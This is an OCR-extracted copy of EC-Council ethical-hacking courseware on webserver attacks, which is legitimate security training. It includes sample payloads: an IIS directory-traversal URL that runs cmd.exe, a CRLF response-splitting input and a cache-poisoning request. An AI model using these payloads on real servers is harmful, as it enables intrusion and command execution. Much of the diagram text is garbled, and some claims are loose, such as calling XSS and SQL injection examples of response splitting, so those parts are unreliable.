SlideShare una empresa de Scribd logo
1 de 123
Descargar para leer sin conexión
H a c k in g W e b s e r v e rs

Module 12
Ethical Hacking and Countermeasures
Hacking Webservers

Exam 312-50 Certified Ethical Hacker

Hacking Webservers
Module 12

En g in e e red by

Hackers.

Pre se n te d by Professio nals.

E th ic a l H a c k in g a n d C o u n te r m e a s u r e s v8
M odule 12: Hacking Webservers
Exam 312-50

Module 12 Page 1601

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Hacking Webservers

Exam 312-50 Certified Ethical Hacker

GoDaddy Outage Takes Down Millions of Sites,
Anonymous Member Claim s Responsibility
Monday, September 10th, 2012

Final update: GoDaddy is up, and claims th a t the outage was due to internal errors
and not a DD0S attack.
According to many customers, sites hosted by major web host and domain registrar
GoDaddy are down. According to the official GoDaddy Tw itter account the company is
aware o f the issue and is working to resolve it.
Update: customers are com plaining tha t GoDaddy hosted e-mail accounts are down as
well, along w ith GoDaddy phone service and all sites using GoDaddy's DNS service.
Update 2: A m em ber o f Anonymous known as AnonymousOwn3r is claiming
responsibility, and makes it clear this is not an Anonymous collective action.
A tipste r tells us tha t the technical reason fo r the failure is being caused by the
inaccessibility o f GoDaddy's DNS servers — specifically CNS1.SECURESERVER.NET,
CNS2.SECURESERVER.NET, and CNS3.SECURESERVER.NET are failing to resolve.

http://techcrunch.com
Copyright © by E - * n i . All Rights Reserved. Reproduction is Strictly Prohibited.
GGacl

S ecurity N ew s
Nnus

GoD addy O utage T akes Down M illions of Sites,
Anonym ous M em ber C laim s R esponsibility

Source: http://techcrunch.com
Final update: GoDaddy is up, and claims that the outage was due to internal errors and not a
DD0 S attack.
According to many customers, sites hosted by major web host and domain registrar GoDaddy
are down. According to the official GoDaddy Twitter account, the company is aware of the
issue and is working to resolve it.
Update: Customers are complaining that GoDaddy hosted e-mail accounts are down as well,
along with GoDaddy phone service and all sites using GoDaddy's DNS service.
Update 2: A member of Anonymous known as AnonymousOwn3r is claiming responsibility, and
makes it clear this is not an Anonymous collective action.
A tipster tells us that the technical reason for the failure is being caused by the inaccessibility of
GoDaddy's DNS servers -

specifically CNS1.SECURESERVER.NET, CNS2.SECURESERVER.NET,

and CNS3.SECURESERVER.NET are failing to resolve.

Module 12 Page 1602

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Hacking Webservers

Exam 312-50 Certified Ethical Hacker

AnonymousOwn3r‫׳‬s bio reads "Security leader of #Anonymous (‫ ”׳‬Official m em ber")." The
individual claims to be from Brazil, and hasn't issued a statement as to why GoDaddy was
targeted.
Last year GoDaddy was pressured into opposing SOPA as customers transferred domains off the
service, and the company has been the center of a few other controversies.

However,

AnonymousOwn3r has tweeted "I'm not anti go daddy, you guys will understand because i did
this attack."

Copyright © 2012 AOL Inc.
By Klint Finley
http://techcrunch.com/2012/09/10/godaddy-outage-takes-down-millions-of-sites/

Module 12 Page 1603

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Hacking Webservers

Exam 312-50 Certified Ethical Hacker

Module Objectives

CEH

Urt1fW4

J

IIS Webserver Architecture

J

Countermeasures

J

W hy W eb Servers are Compromised?

J

J

Impact of Webserver Attacks

How to Defend Against Web Server
Attacks

J

Webserver Attacks

J

Patch Management

J

Webserver Attack Methodology

J

Patch Management Tools

J

Webserver Attack Tools

J

Webserver Security Tools

J

Metasploit Architecture

J

Webserver Pen Testing Tools

J

Web Password Cracking Tools

J

ttlMUl ttMhM

Webserver Pen Testing

‫ ־־‬L /

^

Copyright © by IG-COHCil. All Rights Reserved. Reproduction is Strictly Prohibited.

^ M odule O b jectiv e s
•—*
>

Often, a breach in security causes more damage in terms of goodwill than in actual

quantifiable loss. This makes web server security critical to the normal functioning of an
organization. Most organizations consider their web presence to be an extension of
themselves. This module attempts to highlight the various security concerns in the context of
webservers. After finishing this module, you will able to understand a web server and its
architecture, how the attacker hacks it, what the different types attacks that attacker can carry
out on the web servers are, tools used in web server hacking, etc. Exploring web server security
is a vast domain and to delve into the finer details of the discussion is beyond the scope of this
module. This module makes you familiarize with:
e

IIS Web Server Architecture

e

e

W hy W eb Servers Are Compromised?

e

e

Webserver Attacks

e

Webserver Attack Methodology

Q

Webserver Attack Tools

e

Metasploit Architecture

e

Web Password Cracking Tools

Module 12 Page 1604

How to Defend Against W eb
Server Attacks

Impact of Webserver Attacks

e

Countermeasures

e

Patch Management

0

Patch Management Tools

e

W ebserver Security Tools

e

W ebserver Pen Testing Tools

e

W ebserver Pen Testing

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Hacking Webservers

Exam 312-50 Certified Ethical Hacker

Module Flow

CEH

Copyright © by EG-G(IIIICil. All Rights Reserved. Reproduction is Strictly Prohibited.

M o d u l e F lo w
To understand hacking web servers, first you should know what a web server is, how
it functions, and what are the other elements associated with it. All these are simply termed
web server concepts. So first we will discuss about web server concepts.
4

m)

Webserver Attacks

Webserver Concepts
------

Attack Methodology

*

Webserver Pen Testing

y

Patch Management

Webserver Attack Tools

Webserver Security Tools

■—
■—

Counter-measures

This section gives you brief overview of the web server and its architecture. It will also explain
common reasons or mistakes made that encourage attackers to hack a web server and become
successful in that. This section also describes the impact of attacks on the web server.

Module 12 Page 1605

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Hacking Webservers

Exam 312-50 Certified Ethical Hacker

Webserver Market Shares
I ______ I ______ I _______I_______ I _______I
_
_
_
_

64.6%

Apache

Microsoft - IIS

LiteSpeed

I

1.7%

Google Server

|

1.2%

W eb S e rv e r M a rk e t S h a re s
Source: http://w3techs.com
The following statistics shows the percentages of websites using various web servers. From the
statistics, it is clear that Apache is the most commonly used web server, i.e., 64.6%. Below that
Microsoft ‫ ־‬IIS server is used by 17.4 % of users.

Module 12 Page 1606

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Hacking Webservers

Apache

Exam 312-50 Certified Ethical Hacker

t

‫כ‬

64.6%

17.4%

Microsoft ‫ ־‬IIS

13%

Nginx

LiteSpeed

Google Server

Tomcat

Lighttpd

10

20

30

40

50

60

70

‫־‬J -----►

80%

FIGURE 12.1: Web Server Market Shares

Module 12 Page 1607

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Hacking Webservers

Exam 312-50 Certified Ethical Hacker

CEH

Open Source W ebserver
Architecture
Site Users

Site Admin

Attacks

r

:1 a
1

I

□

©

Linux

1
File System

^

.........

I—

*‫—־‬

I

Apache

Email

‫י ג יני מ‬
PHP

Applications

‫י‬

Compiled Extension

MySQL

i f

Copyright © by EG-G(IIIICil. All Rights Reserved. Reproduction is Strictly Prohibited.

B

O p e n S o u rc e W e b S e rv e r A rc h ite c tu re
The diagram bellow illustrates the basic components of open source web server

architecture.

Module 12 Page 1608

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Hacking Webservers

Exam 312-50 Certified Ethical Hacker

Site Users

Site Admin

‫־׳‬

*A

&

Attacks

1

U

Internet

Linux

File System

J
"‫־‬

Apache

V

Email

PHP
f

Applications

Compiled Extension

MySQL y

FIGURE 12.2: Open Source Web Server Architecture

Where,

© Linux - the server's operating system
© Apache - the web server component
© MySQL - a relational database
© PHP - the application layer

Module 12 Page 1609

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Hacking Webservers

Exam 312-50 Certified Ethical Hacker

IIS Web Server Architecture

Internet Information
Services (IIS) for Windows

Client

i * a

C H
IE

HTTP Protocol
Stack (HTTP.SYS)

f t p

Server is a flexible, secure,
and easy-to-manage web
server for hosting anything
on the web

Kernel Mode
User Mode
Svchost.exe

:■

+

Windows Activation Service
_________ (WAS)__________

Application Pool

Web Server Core

Native Modules

AppDomain

Begin request processing,
authentication,
authorization, cache
resolution, handler
mapping, handler preexecution, release state,
update cache, update
log, and end request
processing

Anonymous
authentication,
managed engine, IIS
certificate mapping,
static file, default
document, HTTP cache,
HTTP errors, and HTTP
logging

Managed
Modules

WWW Service

External Apps

application
Host.config

Forms
Authentication

Copyright © by EG-G(IIIICil. All Rights Reserved. Reproduction is Strictly Prohibited.

IIS W e b S e r v e r A r c h i t e c t u r e
‫3׳‬
c3
by

----- ---------------------------------IIS, also known as Internet Information Service, is a web server application developed

Microsoft that can be used with Microsoft Windows. This is the second largest web after

Apache HTTP server. IT occupies around 17.4% of the total market share. It supports HTTP,
HTTPS, FTP, FTPS, SMTP, and NNTP.
The diagram that follows illustrates the basic components of IIS web server architecture:

Module 12 Page 1610

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Hacking Webservers

Exam 312-50 Certified Ethical Hacker

Client
HTTP Protocol
Stack (HTTP.SYSI

In ternet

Kernel M o d e

User Mode
Svchost.exe

A pplication Pool

W in d o w s A ctiva tio n S e rv ice
(W A S )

N ative M od ules

W e b S erver Core

AppD om ain

Anonymous
authentication,
Managed engine, IIS
certificate mapping,
static file, default
document, HTTP cache,
HTTP errors, and HTTP
logging

Managed
M odules

WWW Service
Begin requestprocessing/
authentication,
authorization, cache
resolution, handler
mapping, handler pre*
execution, release state,

application
Host.config

update cache, update
log, and end request
processing

Forms
A uthentication

FIGURE 12.3: IIS Web Server Architecture

Module 12 Page 1611

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Hacking Webservers

Exam 312-50 Certified Ethical Hacker

Website Defacement
J

Web defacement occurs when
an intruder maliciously alters

Fie M l‫ז‬

*

fe w

*

CEH

Hep

W

©

http://juggyboy.com/index.aspx

v

‫^ ד‬

•j_>
‫־‬

visual appearance of a web
page by inserting or
substituting provocative and
frequently offending data
J

Y o u a re O W N E D ! ! ! ! ! ! !

Defaced pages exposes visitors
to some propaganda or
misleading information until
the unauthorized change is
discovered and corrected

H A C K E D !
Hi M aster, Your w e b s ite o w n e d
by US, H acker!
N ext ta rg et - m icrosoft.com

Copyright © by EG-G(IIIICil. All Rights Reserved. Reproduction is Strictly Prohibited.

W ebsite D e facem en t
Website defacement is a process of changing the content of a website or web page
by hackers. Hackers break into the web servers and will alter the hosted website by creating
something new.
W eb defacement occurs when an intruder maliciously alters the visual appearance of a web
page by inserting or substituting provocative and frequently offensive data. Defaced pages
expose visitors to propaganda or misleading information until the unauthorized change is
discovered and corrected.

Module 12 Page 1612

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Hacking Webservers

Exam 312-50 Certified Ethical Hacker

BO ®

World Wide Web
File

Edit

View

Help

,
‫יי‬

FIGURE 12.4: Website Defacement

Module 12 Page 1613

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Hacking Webservers

Unnecessary default, backup, or
sample files
Security conflicts with business ease-ofuse case
Misconfigurations in web server, operating systems,
and networks
Lack of proper security policy, procedures, and
maintenance
Bugs in server software, OS, and
web applications
Improper authentication with external
systems
Administrative or debugging functions that are
enabled or accessible

Exam 312-50 Certified Ethical Hacker

Installing the server with default
settings
Improper file and
directory permissions
Default accounts with their default or no
passwords
Security flaws in the server software, OS and
applications
Misconfigured SSL certificates and encryption
settings
Use of self-signed certificates and
default certificates
Unnecessary services enabled, including content
management and remote administration

Copyright © by EG-G(IIIICil. All Rights Reserved. Reproduction is Strictly Prohibited.

W h y W e b S e r v e r s A re C o m p r o m i s e d
There are inherent security risks associated with web servers, the local area networks
that host web sites and users who access these websites using browsers.
0

W ebm aster's Concern: From a webmaster's perspective, the biggest security concern is
that the web server can expose the local area network (LAN) or the corporate intranet
to the threats the Internet poses. This may be in the form of viruses, Trojans, attackers,
or the compromise of information itself. Software bugs present in large complex
programs are often considered the source of imminent security lapses. However, web
servers that are large complex devices and also come with these inherent risks. In
addition, the open architecture of the web servers allows arbitrary scripts to run on the
server side while replying to the remote requests. Any CGI script installed at the site
may contain bugs that are potential security holes.

Q

Network Administrator's Concern: From a network administrator's perspective, a
poorly configured web server poses another potential hole in the local network's
security. W hile the objective of a web is to provide controlled access to the network, too
much of control can make a web almost impossible to use. In an intranet environment,
the network administrator has to be careful about configuring the web server, so that
the legitimate users are recognized and authenticated, and various groups of users
assigned distinct access privileges.

Module 12 Page 1614

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Hacking Webservers

6

Exam 312-50 Certified Ethical Hacker

End User's Concern: Usually, the end user does not perceive any immediate threat, as
surfing the web appears both safe and anonymous. However, active content, such as
ActiveX controls and Java applets, make it possible for harmful applications, such as
viruses, to invade the user's system. Besides, active content from a website browser can
be a conduit for malicious software to bypass the firewall system and permeate the
local area network.

The table that follows shows the causes and consequences of web server compromises:
Cause

Consequence

Installing the server with default
settings

Unnecessary default, backup, or sample files

Improper file and directory permissions

Security conflicts with business ease-of-use
case

Default accounts with their default
passwords
Unpatched security flaws in the server
software, OS, and applications
Misconfigured SSL certificates and
encryption settings
Use of self-signed certificates and
default certificates
Unnecessary services enabled, including
content management and remote
administration

Misconfigurations in web server, operating
systems and networks
Lack of proper security policy, procedures,
and maintenance
Bugs in server software, OS, and web
applications
Improper authentication with external
systems
Administrative or debugging functions that
are enabled or accessible

TABBLE 12.1: causes and consequences of web server compromises

Module 12 Page 1615

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Hacking Webservers

Exam 312-50 Certified Ethical Hacker

Impact of Webserver Attacks

CEH
C«rt1fW
4

itfciul Nm Im

©
Data ta m p e rin g

W e b s ite d e fa c e m e n t

R o o t access to o th e r
a p p licatio n s o r servers

Copyright © by EG-G(IIIICil. All Rights Reserved. Reproduction is Strictly Prohibited.

I m p a c t o f W e b S e r v e r A tt a c k s
Attackers can cause various kinds of damage to an organization by attacking a web
server. The damage includes:
0

Compromise of user accounts: W eb server attacks are mostly concentrated on user
account compromise. If the attacker is able to compromise a user account, then the
attacker can gain a lot of useful information. Attacker can use the compromised user
account to launch further attacks on the web server.

0

Data tampering: Attacker can alter or delete the data. He or she can even replace the
data with malware so that whoever connects to the web server also becomes
compromised.

0

W ebsite defacement: Hackers completely change the outlook of the website by
replacing the original data. They change the website look by changing the visuals and
displaying different pages with the messages of their own.

0

Secondary attacks from the website: Once the attacker compromises a web server, he
or she can use the server to launch further attacks on various websites or client systems.

0

Data theft: Data is one of the main assets of the company. Attackers can get access to
sensitive data of the company like source code of a particular program.

Module 12 Page 1616

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Hacking Webservers

0

Exam 312-50 Certified Ethical Hacker

Root access to other applications or server: Root access is the highest privilege one gets
to log in to a network, be it a dedicated server, semi-dedicated, or virtual private server.
Attackers can perform any action once they get root access to the source.

Module 12 Page 1617

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Hacking Webservers

Exam 312-50 Certified Ethical Hacker

M odule Flow

CEH

Copyright © by EG-G(IIIICil. All Rights Reserved. Reproduction is Strictly Prohibited.

M o d u l e F lo w
Considering that you became familiar with the web server concepts, we move forward
to the possible attacks on web server. Each and every action on online is performed with the
help of web server. Hence, it is considered as the critical source of an organization. This is the
same reason for which attackers are targeting web server. There are many attack technique
used by the attacker to compromise web server. Now we will discuss about those attack
techniques.
attack, HTTP response splitting attack, web cache poisoning attack, http response hijacking,
web application attacks, etc.

Webserver Concepts

^

Attack Methodology

Webserver Pen Testing

-y

Module

Webserver Attacks

Patch Management

12 Page 1618

^

J

Webserver Attack Tools

3 Webserver Security Tools

■—
■—

Counter-measures

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Hacking Webservers

Exam 312-50 Certified Ethical Hacker

Web Server Misconfiguration

CEH

Server misconfiguration refers to configuration weaknesses in web infrastructure that can be
exploited to launch various attacks on web servers such as directory traversal, server intrusion,
and data theft

Verbose debug/error

Remote Administration
Functions

Unnecessary Services
Enabled

Anonymous or Default
Users/Passwords

Sample Configuration,
and Script Files

Misconfigured/Default
SSL Certificates

Copyright © by E - t i c l All Rights Reserved. Reproduction is Strictly Prohibited.
GGlni.

W eb S e rv e r M is c o n fig u ra tio n
W eb servers have various vulnerabilities related to configuration, applications, files,
scripts, or web pages. Once these vulnerabilities are found by the attacker, like remote
accessing the application, then these become the doorways for the attacker to enter into the
network of a company. These loopholes of the server can help attackers to bypass user
authentication. Server misconfiguration refers to configuration weaknesses in web
infrastructure that can be exploited to launch various attacks on web servers such as directory
traversal, server intrusion, and data theft. Once detected, these problems can be easily
exploited and result in the total compromise of a website.
e

Remote administration functions can be a source for breaking down the server for the
attacker.

©

Some unnecessary services enabled are also vulnerable to hacking.

0

Misconfigured/default SSL certificates.

© Verbose debug/error messages.
Q

Anonymous or default users/passwords.

©

Sample configuration and script files.

Module 12 Page 1619

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Hacking Webservers

Exam 312-50 Certified Ethical Hacker

Web Server Misconfiguration
Example

CEH

httpd.conf file on an Apache server

<Location /server-status>
SetHandler server-status
</Location>
This configuration allows anyone to view the server status page, w hich contains detailed info rm atio n about
the current use o f the web server, including info rm atio n about the cu rre n t hosts and requests being processed

php.ini file

display_error = On
log_errors = On
error_log = syslog
ignore repeated errors = Off
This configuration gives verbose error messages

Copyright © by EG-G(IIIICil. All Rights Reserved. Reproduction is Strictly Prohibited.

f I W e b S e rv e r M is c o n fig u ra tio n E x a m p le
ran

n■

L 1 :J

Consider the httpd.conf file on an Apache server.
<Location /server-status>
SetHandler server-status
</Location>
FIGURE 12.5: httpd.conf file on an Apache server

This configuration allows anyone to view the server status page that contains detailed
information about the current use of the web server, including information about the current
hosts and requests being processed.
Consider another example, the php.ini file.
display_error = On
log_errors - On
error_log = syslog
ignore repeated errors = Off
FIGURE 12.6: php.inifile on an Apache server

This configuration gives verbose error messages.
Module 12 Page 1620

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Hacking Webservers

Exam 312-50 Certified Ethical Hacker

3

Volume in drive C has no label.
Volume Serial Number is D45E-9FEE

j My Computer
+
1
3Vb floppy (A:)

£

/
I

‫ י‬LocalDt>k((
B
Ctocumcnte and Scttngs

! H t J Inetpub

http://server.eom/s
cripts/..%5c../Wind
0ws/System32/cm
d.exe?/c+dir+c:

Copyright © by EG-G(IIIICil. All Rights Reserved. Reproduction is Strictly Prohibited.

D i r e c t o r y T r a v e r s a l A t ta c k s
W eb servers are designed in such a way that the public access is limited to some
extent. Directory traversal is exploitation of HTTP through which attackers are able to access
restricted directories and execute commands outside of the web server root directory by
manipulating a URL. Attackers can use the trial-and-error method to navigate outside of the
root directory and access sensitive information in the system.
Volume in drive C has no label.
Volume Serial Number is D45E-9FEE
Directory of C:

http://server.eom/s

cripts/..%5c../Wind
0ws/System32/cm
d.exe?/c+dir+c:

1,024 .rnd
06/02/2010 11:31AM
09/28/2010 06:43 PM
0 123.text
05/21/2010 03:10 PM
0 AUTOEXEC.BAT
09/27/2010 08:54 PM <DIR>
CATALINA_HOME
0 CONFIG.SYS
05/21/2010 03:10 PM
Documents and Settings
08/11/2010 09:16 AM <DIR>
09/25/2010 05:25 PM <DIR>
Downloads
08/07/2010 03:38 PM <DIR>
Intel
09/27/2010 09:36 PM <DIR>
Program Files
05/26/2010 02:36 AM <DIR>
Snort
09/28/2010 09:50 AM <DIR>
WINDOWS
09/25/2010 02:03 PM
569,344 WlnDump.exe
7 File(s)
570, 368 bytes
13 Dir( s) 13,432 ,115,200 bytes free

F IG U R E

Module 12 Page 1621

E

Q-j !v!v!Tffxl
company

1 ‫ ו‬downloads

E O imgs
ae
O

news

scripts □
C J support

1 2 .7 : D i r e c t o r y T r a v e r s a l A t t a c k s

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Hacking Webservers

Exam 312-50 Certified Ethical Hacker

CEH

HTTP R esponse Splitting Attack

(•ttlfw
tf

HTTP response splitting attack involves adding
header response data into the input field so
that the server split the response into two
responses

itkNjI N hM
M

Input = Jason
HTTP/1.1 200 OK
Set-Cookie: author=Jason

The attacker can control the first response to
redirect user to a malicious website whereas
the other responses will be discarded by web
browser

Input = JasonTheHackerrnHTTP/l.l 200 OKrn

y
String author =
request.getParameter(AUTHOR_PA
RAM ;
)
Cookie cookie = new
Cookie("author‫ , ״‬author);
cookie.setMaxAge(cookieExpirat
ion) ;
response.addCookie(cookie);

First Response (Controlled by Attacker)

Set-Cookle: author=JasonTheHacker
HTTP/1.1200 OK

Second Response

HTTP/1.1 200 OK

Copyright © by EG-G(IIIICil. All Rights Reserved. Reproduction is Strictly Prohibited.

H T T P R e s p o n s e S p l itt i n g A tta c k
An HTTP response attack is a web-based attack where a server is tricked by injecting
new lines into response headers along with arbitrary code. Cross-Site Scripting (XSS)‫ ׳‬Cross Site
Request Forgery (CSRF), and SQL Injection are some of the examples for this type of attacks.
The attacker alters a single request to appear and be processed by the web server as two
requests. The web server in turn responds to each request. This is accomplished by adding
header response data into the input field. An attacker passes malicious data to a vulnerable
application, and the application includes the data in an HTTP response header. The attacker can
control the first response to redirect the user to a malicious website, whereas the other
responses will be discarded by web browser.

Module 12 Page 1622

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Hacking Webservers

Exam 312-50 Certified Ethical Hacker

Input = Jason
HTTP/1.1 200 OK
Set-Cookie: author=Jason

Input =JasonTheHackerrnHTTP/l.l 200 OKrn

First Response (Controlled by Attacker)

o

String author =
request.getParameter(AUTHOR_PA
RA ) ;
M

S
i

Cookie cookie = new
Cookie("author", author);
cookie.setMaxAge(cookieExpirat
ion) ;
response.addCookie(cookie);

0
5

<)
/

Set-Cookie; author=JasonTheHacker
HTTP/1.1 200 OK

S e c o n d R e sp o n se

HTTP/1.1200 OK

FIGURE 12.8: HTTP Response Splitting Attack

Module 12 Page 1623

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Hacking Webservers

Exam 312-50 Certified Ethical Hacker

Web Cache Poisoning Attack CEH
Original Juggyboy page

GET http://juggyboy.com/index.html
HTTP/1.1
Pragma: no-cache
Host: juggyboy.com
Accept-Charset: iso-8859-1,*,utf-8
GET http://juggyboy.com/
redir.php?site=%Od%OaContentLength :%200%0d%0a%0d%0aHTTP/l.l%2
02(X>%20OK%0d%0aLastModified :%20Mon,%2027%200ct%20200
9%2014:50:18%20GMT*0d%0aConte ntLength :%2020%0d%0aContcnt•
Typ«:%20text/htmr%0d%0a%0d%0a<html
>
Attack Pagc</html> HTTP/1.1

Host: Juggyboy.com
GET
http://juggyboy.com/index.html
HTTP/1.1 Host: testsite.com
User-Agent: Mozilla/4.7 [en]
(WinNT; I)
Accept-Charset: iso-8859-l,*,utf8‫־‬

Attacker sends request to remove page from cache
h ttp ://w w w .ju g g y b o y .c o m /w el
com e.php?lang=

Normal response after
clearing the cache for juggyboy.com

<?php h e a d e r ("L ocation:" .
$_GET['page']); ?>

Attacker sends malicious request
that generates two responses (4 and 6)

Attacker gets first server response

An attacker forces the
A ttacker re q u e s ts d juggyboy.com
again to g e n e ra te ca ch e e n try
The second
response of
request [3
that points to
I attacker's page

Attacker gets the second

web server's cache to
flush its actual cache
content and sends a
specially crafted
request, which will be
stored in cache

Address

Page

www.jujjyboy.com

Attacker's page

Poisoned Server Cache

Copyright © by E - t i c l All Rights Reserved. Reproduction is Strictly Prohibited.
GGlni.

W e b C a c h e P o i s o n i n g A tta c k
W eb cache poisoning is an attack that is carried out in contrast to the reliability of an
intermediate web cache source, in which honest content cached for a random URL is swapped
with infected content. Users of the web cache source can unknowingly use the poisoned
content instead of true and secured content when demanding the required URL through the
web cache.
An attacker forces the web server's cache to flush its actual cache content and sends a specially
crafted request to store in cache. In the following diagram, the whole process of web cache
poisoning is explained in detail with a step-by-step procedure.

Module 12 Page 1624

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Hacking Webservers

Exam 312-50 Certified Ethical Hacker

Addm 
www.Im^YLuy.cum

GET http://juggyboy.com/indeM.html
HTTP/1.1
Pragm a: no-cache
H ost: juggyboy.com
A ccept-C harset: iso-8859-1,T,utf-8
GET http://juggyboy.com/
r«dir.php?site=%Od%OaContentL*ngth:%200%Od%Oa%Od%OaHTTP/l.l%2
02009(2OOKHOdKOaLastModified :%20Mon,%202 7%200ct%20200
9*2014:50:18K20GMT%0d%0aContentLength: 020%0d%0aContentTyp«:%20text/html%0d%0a%0d%08<htm!
*Attack Page</html> HTTP/1.1

Ofigln.il Juggyboy page

Server Cache

I

A ttac k er s e n d s re q u e s t t o re m o v e page from cache

http://www.juggyboy.com/wel
come.php?lang=

Norm al re s p o n s e a f te r
clearing th e cache forjuggyboy.com

<?php header ("Location:" .
$_GET['page']); ?>

A ttac k er s e n d s m alicious re q u e s t
th a t g e n e ra te s tw o re s p o n s e s (4 and 6)

2

Host: juggyboy.com
GET
h ttp ://ju g g y b o y .c o m /in d e x .h tm l
HTTP/1.1 Host: te s ts ite .c o m
U ser-A gent: M ozilla/4.7 [en]
(W lnNT; I)

Accept-Charset iso-8859-l,‫,״‬utf-8

A ttac k er g e ts first se rv e r re s p o n s e

Attacker re q u e sts a ju g g Y b o y.co m
again to generate cache entry
Attack!e r g e ts t h e second _> 1
;
__

. ‫׳‬W re q u e s t o f o n s e

^

..... ......■
>
The
ind
res!
.ponse of
‫ י‬requ
th a t p o in t! to
:k e f's page

Address
www.JuKjjytiyy.to1n

1
‘igr
AtU ckvr'vp^v

Poisoned Server Cache

FIGURE 12.9: Web Cache Poisoning Attack

Module 12 Page 1625

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Hacking Webservers

Exam 312-50 Certified Ethical Hacker

+

Copyright © by EG-GtUIICil. All Rights Reserved. Reproduction is Strictly Prohibited.

HTTP R esp o n se H ijack in g
HTTP response hijacking is accomplished with a response splitting request. In this
attack, initially the attacker sends a response splitting request to the web server. The server
splits the response into two and sends the first response to the attacker and the second
response to the victim. On receiving the response from web server, the victim requests for
service by giving credentials. At the same time, the attacker requests the index page. Then the
web server sends the response of the victim's request to the attacker and the victim remains
uninformed.
The diagram that follows shows the step-by-step procedure of an HTTP response hijacking
attack:

Module 12 Page 1626

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Hacking Webservers

Exam 312-50 Certified Ethical Hacker

FIGURE 12.10: HTTP Response Hijacking

Module 12 Page 1627

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Hacking Webservers

Exam 312-50 Certified Ethical Hacker

SSH B r u te f o rc e A tta c k

CEH
C«rt1fW
4

1^1

itfciul lUclw(

SSH protocols are used to create an encrypted SSH tunnel between two hosts in order to transfer
unencrypted data over an insecure network

Attackers can bruteforce SSH login credentials to gain unauthorized access to a SSH tunnel

q

SSH tunnels can be used to transmit malwares and other exploits to victims without being
detected

I
Mail Server

Internet

User

SSH Server

Web Server

Application Server

File Server

Attacker
Copyright © by EG-G(IIIICil. All Rights Reserved. Reproduction is Strictly Prohibited.

SSH B r u te F o r c e A tt a c k
SSH protocols are used to create an encrypted SSH tunnel between two hosts in order
to transfer unencrypted data over an insecure network. In order to conduct an attack on SSH,
first the attacker scans the entire SSH server to identify the possible vulnerabilities. With the
help of a brute force attack, the attacker gains the login credentials. Once the attacker gains the
login credentials of SSH, he or she uses the same SSH tunnels to transmit malware and other
exploits to victims without being detected.

I

Mail Server

Attacker

FIGURE 12.11: SSH Brute Force Attack

Module 12 Page 1628

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Hacking Webservers

Exam 312-50 Certified Ethical Hacker

Man-in-the‫־‬Middle Attack

CEH

J

Man-in-the-Middle (M ITM ) attacks allow an attacker to access sensitive information by intercepting
and altering communications between an end-user and webservers

J

Attacker acts as a proxy such that all the communication between the user and Webserver passes
through him

Normal Traffic

p

o* •
O •

- W ebserver
a

Attacker

